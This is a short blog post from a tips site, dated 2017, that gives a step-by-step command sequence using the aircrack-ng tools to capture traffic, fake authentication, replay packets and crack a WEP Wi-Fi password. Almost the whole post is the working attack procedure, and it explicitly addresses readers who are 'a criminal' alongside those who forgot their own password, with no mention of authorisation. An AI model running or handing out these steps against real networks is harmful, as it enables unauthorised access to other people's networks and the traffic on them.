Wireless Army
This is a blog / tips and tricks website for web developers and security researchers.
follow us in feedly


connect to wifi with wep password
by admin
 at 2017-05-10 19:56:00.

if you want to connect to a network using wep password like your home network but you forgot the password or you are a criminal you can have the password in few steps:
open a terminal

airmon-ng
airmon-ng start wlan0
airodump-ng mon0

Copy the target bssid

airodump-ng -c (channel) -w filename --bssid (thebssid) mon0

new terminal

aireplay-ng -1 0 -a (thebssid ) mon0

-1: fake authentication

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff: -b (thebssid) mon0
Y

-2: interactive frame selection -p: set frame control word (hex) -c: set Destination MAC address

new terminal

aircrack-ng -b (thebssid) wep-01.cap